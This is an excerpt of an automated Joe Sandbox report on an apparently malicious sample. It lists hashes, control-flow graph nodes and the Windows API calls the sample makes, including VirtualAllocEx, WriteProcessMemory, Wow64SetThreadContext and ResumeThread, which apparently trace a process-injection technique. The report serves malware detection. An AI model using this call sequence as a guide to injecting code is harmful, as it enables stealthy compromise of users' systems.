                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 2099309fcadd2c7043d0d27b18e0afbd8f3c1d403559c475f345f0beca7ee19a
                                                  • Instruction ID: 07dd3478cae3d057e3f82cb99ca60156696da986aeb2dddd5dceb563eb5e2a0a
                                                  • Opcode Fuzzy Hash: 2099309fcadd2c7043d0d27b18e0afbd8f3c1d403559c475f345f0beca7ee19a
                                                  • Instruction Fuzzy Hash: 6C712470A00B098FD724DF2AD45176BBBF1FF88314F108929E19AD7A60DB75E845CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1559 51f1408-51f1d5e 1561 51f1d69-51f1d70 1559->1561 1562 51f1d60-51f1d66 1559->1562 1563 51f1d7b-51f1e1a CreateWindowExW 1561->1563 1564 51f1d72-51f1d78 1561->1564 1562->1561 1566 51f1e1c-51f1e22 1563->1566 1567 51f1e23-51f1e5b 1563->1567 1564->1563 1566->1567 1571 51f1e5d-51f1e60 1567->1571 1572 51f1e68 1567->1572 1571->1572 1573 51f1e69 1572->1573 1573->1573
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051F1E0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: ea23f404a13d7afa80ccb2779c1f3894a83c27ae4321136f4557ef9235ad996e
                                                  • Instruction ID: c3259cfba7a587ee6873f3e663d2cb3b0cbc3bf3c9ab8ce5db757135aa81ed7c
                                                  • Opcode Fuzzy Hash: ea23f404a13d7afa80ccb2779c1f3894a83c27ae4321136f4557ef9235ad996e
                                                  • Instruction Fuzzy Hash: 6751B1B5D00349EFDB14CFAAC884ADEBBB5FF48310F24852AE519AB210D7759885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1574 51f1cec-51f1d5e 1575 51f1d69-51f1d70 1574->1575 1576 51f1d60-51f1d66 1574->1576 1577 51f1d7b-51f1db3 1575->1577 1578 51f1d72-51f1d78 1575->1578 1576->1575 1579 51f1dbb-51f1e1a CreateWindowExW 1577->1579 1578->1577 1580 51f1e1c-51f1e22 1579->1580 1581 51f1e23-51f1e5b 1579->1581 1580->1581 1585 51f1e5d-51f1e60 1581->1585 1586 51f1e68 1581->1586 1585->1586 1587 51f1e69 1586->1587 1587->1587
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051F1E0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 867359ff584343018a5cea734a4544026c1babf6e10785459ae153d75372c239
                                                  • Instruction ID: d0547f99b2206cd4c6ce7178aed56863f17800ae40e4202e5ab7ff3849cfdee5
                                                  • Opcode Fuzzy Hash: 867359ff584343018a5cea734a4544026c1babf6e10785459ae153d75372c239
                                                  • Instruction Fuzzy Hash: 5851D0B5D00309EFDB14CFA9C984ADEBBB5BF48300F24812AE519AB210D7759985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1588 51f155c-51f42fc 1591 51f43ac-51f43cc call 51f1434 1588->1591 1592 51f4302-51f4307 1588->1592 1599 51f43cf-51f43dc 1591->1599 1594 51f435a-51f4392 CallWindowProcW 1592->1594 1595 51f4309-51f4340 1592->1595 1597 51f439b-51f43aa 1594->1597 1598 51f4394-51f439a 1594->1598 1602 51f4349-51f4358 1595->1602 1603 51f4342-51f4348 1595->1603 1597->1599 1598->1597 1602->1599 1603->1602
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 051F4381
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 08a7fa0eedfdd5af677508975aec8def7d48d02b534dbf7ad789fae766bd2190
                                                  • Instruction ID: 4aa25a103f921dbf64ef7931d831f4031dfdbd686e46a9b6371f74d4254cdc7e
                                                  • Opcode Fuzzy Hash: 08a7fa0eedfdd5af677508975aec8def7d48d02b534dbf7ad789fae766bd2190
                                                  • Instruction Fuzzy Hash: 194138B8900309CFDB14CF99C448AAFBBF5FF88314F248459D619AB321D374A841CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1605 ff44c4-ff59d9 CreateActCtxA 1608 ff59db-ff59e1 1605->1608 1609 ff59e2-ff5a3c 1605->1609 1608->1609 1616 ff5a3e-ff5a41 1609->1616 1617 ff5a4b-ff5a4f 1609->1617 1616->1617 1618 ff5a51-ff5a5d 1617->1618 1619 ff5a60 1617->1619 1618->1619 1621 ff5a61 1619->1621 1621->1621
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00FF59C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 3db3ebc8341d55f89c858ee8dea4387603fdedfd058b36a8e0583acfd8c8d646
                                                  • Instruction ID: 922530c12a304c73d2cdbef9f9cae68ddc20acd187b3c754d8964d3eb347e490
                                                  • Opcode Fuzzy Hash: 3db3ebc8341d55f89c858ee8dea4387603fdedfd058b36a8e0583acfd8c8d646
                                                  • Instruction Fuzzy Hash: 5841E470C0071DCBDB24CFA9C88479EBBF5BF49704F20816AD508AB265DB756945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1622 ff590c-ff5912 1623 ff5918-ff59d9 CreateActCtxA 1622->1623 1625 ff59db-ff59e1 1623->1625 1626 ff59e2-ff5a3c 1623->1626 1625->1626 1633 ff5a3e-ff5a41 1626->1633 1634 ff5a4b-ff5a4f 1626->1634 1633->1634 1635 ff5a51-ff5a5d 1634->1635 1636 ff5a60 1634->1636 1635->1636 1638 ff5a61 1636->1638 1638->1638
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00FF59C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e9c7df51ee8fcbb89c4a7893b6454b6892eb862dad3015b066b565192d435044
                                                  • Instruction ID: d9c01149597d735d8975036b222048cc6f102e19bea3b11cefef89b1a61212ad
                                                  • Opcode Fuzzy Hash: e9c7df51ee8fcbb89c4a7893b6454b6892eb862dad3015b066b565192d435044
                                                  • Instruction Fuzzy Hash: 1541F170C0071DCBDB24CFA9C885B9EBBF5BF49704F20816AD508AB251DB766946CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1639 73b1980-73b19d6 1641 73b19d8-73b19e4 1639->1641 1642 73b19e6-73b1a25 WriteProcessMemory 1639->1642 1641->1642 1644 73b1a2e-73b1a5e 1642->1644 1645 73b1a27-73b1a2d 1642->1645 1645->1644
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B1A18
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 42d674af82fd585a2b2070e62bb6e482614b649cfc186083c65b6e14b947f26d
                                                  • Instruction ID: c55c973a565676342351fc6baf0b5724ee24f35368db3e02272b8c7e3359259c
                                                  • Opcode Fuzzy Hash: 42d674af82fd585a2b2070e62bb6e482614b649cfc186083c65b6e14b947f26d
                                                  • Instruction Fuzzy Hash: 942115B5900359DFDB10CFA9C981BEEBBF5FF48310F14842AE518A7240D7799554CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1649 73b1988-73b19d6 1651 73b19d8-73b19e4 1649->1651 1652 73b19e6-73b1a25 WriteProcessMemory 1649->1652 1651->1652 1654 73b1a2e-73b1a5e 1652->1654 1655 73b1a27-73b1a2d 1652->1655 1655->1654
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B1A18
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 6f14ee647f9ffd70128548ed3175b5bd3fb013c7df8b7d88c3a6566153021015
                                                  • Instruction ID: 777f239825a24a16cef80b239b9e5ab5f192e482590b0e879b3f3ebb9e18d650
                                                  • Opcode Fuzzy Hash: 6f14ee647f9ffd70128548ed3175b5bd3fb013c7df8b7d88c3a6566153021015
                                                  • Instruction Fuzzy Hash: 572113B59003499FDB10CFAAC881BDEBBF5FF48310F10842AE918A7240C778A954CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FFD4CE,?,?,?,?,?), ref: 00FFD58F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: aeb0151ab658c5048f370657dac587ce2a0436d8a19d6821965faa81d15fc3a3
                                                  • Instruction ID: 8455aef523dd95a2830c2ce949f76549bad9f2196ec31252d193731db725d535
                                                  • Opcode Fuzzy Hash: aeb0151ab658c5048f370657dac587ce2a0436d8a19d6821965faa81d15fc3a3
                                                  • Instruction Fuzzy Hash: 3A2105B5900209DFDB10CFAAD484AEEBFF5EF48310F14841AE914A7310D378A950DFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B186E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 2c16d7ec5323decbfa61195069bf6d77b73503a0d8074ce4562e5b400a7617c0
                                                  • Instruction ID: 3b7e81ce182ec845a4265ca92426531e9874a244ed9fc3b327542fcd7476fc5c
                                                  • Opcode Fuzzy Hash: 2c16d7ec5323decbfa61195069bf6d77b73503a0d8074ce4562e5b400a7617c0
                                                  • Instruction Fuzzy Hash: 0F2104B1D003099FEB10DFAAC4857EEBBF4AF89314F14842AD519A7240DB78A945CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B186E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 8aede3c96744c84014177d564491ca44891399aae73f82d2e3d00f4598fdad8b
                                                  • Instruction ID: fd24be34135c3ab84450427fafcebf4c93c8eac91ea326d3e24769fdb463e015
                                                  • Opcode Fuzzy Hash: 8aede3c96744c84014177d564491ca44891399aae73f82d2e3d00f4598fdad8b
                                                  • Instruction Fuzzy Hash: 912134B2D003099FEB10CFAAC5857EEBBF4BF88310F14842AD519A7640DB789945CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B1AF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 680ad67a179e9c3d513391704127c4414cf45a6639d8e13d3c38528f805cbd11
                                                  • Instruction ID: e5bd24e5c1d56b13b7a5bee76cfd91e1c8fc4da34e979b62949210e92f0ac89b
                                                  • Opcode Fuzzy Hash: 680ad67a179e9c3d513391704127c4414cf45a6639d8e13d3c38528f805cbd11
                                                  • Instruction Fuzzy Hash: 752125B1800349DFDF10CFAAC881AEEBBF5FF48310F10842AE519A7240C779A900CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B1AF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 32d08b6eaff0cf80925cd0a90ea634049b4d5f10d9ed8e2bbf16264b6d40f27c
                                                  • Instruction ID: 91ebee1b64f325d3959136f40e6a451e3bc64906132a4a779cc95cfa093386f0
                                                  • Opcode Fuzzy Hash: 32d08b6eaff0cf80925cd0a90ea634049b4d5f10d9ed8e2bbf16264b6d40f27c
                                                  • Instruction Fuzzy Hash: A02103B5C003499FEB10CFAAC985AEEBBF5FF48310F14882AE519A7240D7399511CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FFD4CE,?,?,?,?,?), ref: 00FFD58F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 7d033b4eba6e19b248ca533acd678b9db4ec83b9088aa9b6710b53446b27d481
                                                  • Instruction ID: 9d9569a958a49e24866ad6f792e8b13769889141db9b33e0f011886062dc793a
                                                  • Opcode Fuzzy Hash: 7d033b4eba6e19b248ca533acd678b9db4ec83b9088aa9b6710b53446b27d481
                                                  • Instruction Fuzzy Hash: E821E3B5900209DFDB10CFA9D985AEEBBF5EF48310F14841AE914A3311D378AA54CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FFB2F9,00000800,00000000,00000000), ref: 00FFB50A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 6266223bc00bfe25d161122237993f9485dc3efd90c45d8de8089a2682960d74
                                                  • Instruction ID: 13cd37a57019145b73fddfe8805d46514d4816aadc984728ac375d175167cba2
                                                  • Opcode Fuzzy Hash: 6266223bc00bfe25d161122237993f9485dc3efd90c45d8de8089a2682960d74
                                                  • Instruction Fuzzy Hash: C711D6B6900349DFDB10CF9AD444AAEFBF4EF49310F14845AD515A7210C379A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FFB2F9,00000800,00000000,00000000), ref: 00FFB50A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: de3ea8653f01bd7501dad49a8f77f2d1f5f7d32219adeb7264a2735e62dc7f37
                                                  • Instruction ID: 86846fc766b9670080fb1ba7d779a01c2985b274de172d2b27d2a6a6e9d12f0d
                                                  • Opcode Fuzzy Hash: de3ea8653f01bd7501dad49a8f77f2d1f5f7d32219adeb7264a2735e62dc7f37
                                                  • Instruction Fuzzy Hash: 8011C2B69002499FDB10CFAAD844AEEBBF4AB89710F14841AD519A7210C379A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B1936
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: ab37bb925a28ecc196fec9263f9ba0c73f1be6ff2a10a39914a28b319b4b570d
                                                  • Instruction ID: 57a4723abc28440865f232eb9d912683f86022f3058b928c64b720ae4d57b5a2
                                                  • Opcode Fuzzy Hash: ab37bb925a28ecc196fec9263f9ba0c73f1be6ff2a10a39914a28b319b4b570d
                                                  • Instruction Fuzzy Hash: E91114758003499FDB20DFAAC845ADEBBF5AF88320F248419E519A7250C779A550CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B1936
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 470abc4b34c4f541437c9da29afa9a6f1dfb3da0bf4f8eb04ab99b052971d974
                                                  • Instruction ID: 84a53ac5413201e43d35bb50f595d0590b14da2fd2dc48d97a2d5eb0649483ef
                                                  • Opcode Fuzzy Hash: 470abc4b34c4f541437c9da29afa9a6f1dfb3da0bf4f8eb04ab99b052971d974
                                                  • Instruction Fuzzy Hash: F11167B5800349DFEF10DFA9C8457DEBBF5AF88320F24881AE519A7250C7799500CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073B67B1,?,?), ref: 073B6958
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: c987fcab8194cd2c2df70bc952ba34b2709c5d41075dbb47678e1108faa2489c
                                                  • Instruction ID: 1afda5d5f1fdc2b3c9121e59afa869e6894e51fe966a2bed566dd89046c4a09f
                                                  • Opcode Fuzzy Hash: c987fcab8194cd2c2df70bc952ba34b2709c5d41075dbb47678e1108faa2489c
                                                  • Instruction Fuzzy Hash: 941125B5800749DFDB20DFAAC445BDEBBF4EB48320F10845AD658A7741D338A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 7797cfa27f9077d91d8e9e0fb54844dccaefe59a0218a3e509f1b2ee8f3391a6
                                                  • Instruction ID: a775cc73aeaf54da47d7907af73306292638b899cc15bd503fbcef4aac4c63ac
                                                  • Opcode Fuzzy Hash: 7797cfa27f9077d91d8e9e0fb54844dccaefe59a0218a3e509f1b2ee8f3391a6
                                                  • Instruction Fuzzy Hash: 591116B5D00349CFEB20DFAAC5467EFBBF5AF88210F24842AC559A7250C7395944CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: fd8567ade55bc2f1259ee0179aaa2d264cfd059b295d7d413d70e259b9aba0ba
                                                  • Instruction ID: 7644b07528964e5d5420f016d3fe5e95810589c1905abccd110f51be85f4d173
                                                  • Opcode Fuzzy Hash: fd8567ade55bc2f1259ee0179aaa2d264cfd059b295d7d413d70e259b9aba0ba
                                                  • Instruction Fuzzy Hash: 351113B19003498BEB20DFAAC4457DFBBF4AF88620F24841AD519A7240CB79A944CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073B67B1,?,?), ref: 073B6958
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: d97f774d796f50babdace14f3631d0dea0e01db6b78a4d005fbef2bdd7e76f81
                                                  • Instruction ID: ba3a3bc181e1c3a30303d3488758e5f1bb6e32f4077012022d736e2c6dfc6fe4
                                                  • Opcode Fuzzy Hash: d97f774d796f50babdace14f3631d0dea0e01db6b78a4d005fbef2bdd7e76f81
                                                  • Instruction Fuzzy Hash: 561136B5800749DFDB10CFAAD545BDEBBF4EB48320F10845AD668A7741C338A544CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00FFB27E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 24db6255d8bc12890622c7d3490091400d3e33e1bce1c3e39affe33ec85b7eb8
                                                  • Instruction ID: ace7ee5cd5a5b291d36f6a155dd53a445d69b760313e8a9bdb4920a6817544a9
                                                  • Opcode Fuzzy Hash: 24db6255d8bc12890622c7d3490091400d3e33e1bce1c3e39affe33ec85b7eb8
                                                  • Instruction Fuzzy Hash: F811CDB5C007498BDB10CF9AD444A9EFBF4AF88724F10841AD529A7210C379A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 073B3E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: e8b92d6e5a13cc99db8c5f95da64914aae59c7aea00016a37f3dc8a629d39704
                                                  • Instruction ID: 397789616c36bf8ecd76b96a577236399791e5cffa9439d0c12b6705c3b71efa
                                                  • Opcode Fuzzy Hash: e8b92d6e5a13cc99db8c5f95da64914aae59c7aea00016a37f3dc8a629d39704
                                                  • Instruction Fuzzy Hash: 3111C2B5800359DFDB10DF9AD485BDEBFF8EB48720F10845AE918A7610C379A544CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 073B3E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 7bcd296235e69804115baad4c4dd4aaac5908e4d91580c63bf0ede6435e1d6f5
                                                  • Instruction ID: c47e29ce530547320767cfc7650b706e54468930c4030b864f5ee4996384b9ed
                                                  • Opcode Fuzzy Hash: 7bcd296235e69804115baad4c4dd4aaac5908e4d91580c63bf0ede6435e1d6f5
                                                  • Instruction Fuzzy Hash: 8111D0B5800359DFDB20DF9AD885BDEBBF8EB48720F10845AE518A7610C379A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O};5
                                                  • API String ID: 0-3558557551
                                                  • Opcode ID: 9382cc5c83db8638f8cb9e5746a6b1d593c636946e91ffac9dc5277709e9bf2d
                                                  • Instruction ID: 1c38f3084574f141bacca878820966ee01ccac83265715d495652591bec14fb4
                                                  • Opcode Fuzzy Hash: 9382cc5c83db8638f8cb9e5746a6b1d593c636946e91ffac9dc5277709e9bf2d
